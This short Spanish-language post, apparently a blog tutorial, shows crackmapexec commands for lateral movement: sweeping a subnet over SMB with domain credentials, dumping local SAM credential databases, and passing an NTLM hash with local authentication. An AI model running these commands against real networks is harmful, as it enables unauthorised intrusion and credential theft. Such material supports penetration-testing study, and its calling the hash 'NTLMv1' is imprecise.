Movimientos laterales con crackmapexec

Utilizamos crackmapexec para encontrar que equipos tenemos acceso en una red con un usuario de dominio y password.

crackmapexec smb 192.168.0.0/24 -u user -p password -d domain.local

Podemos tratar de extraer la base SAM local de los dispositivos conectados a la red.

crackmapexec smb 192.168.0.0/24 -u user -p password -d domain.local –sam

Podemos también utilizar el hash NTLMv1 y en este caso usaremos una cuenta local con el siguiente comando.

crackmapexec smb 192.168.0.0/24 -u user -H hash –local-auth

Deja un comentario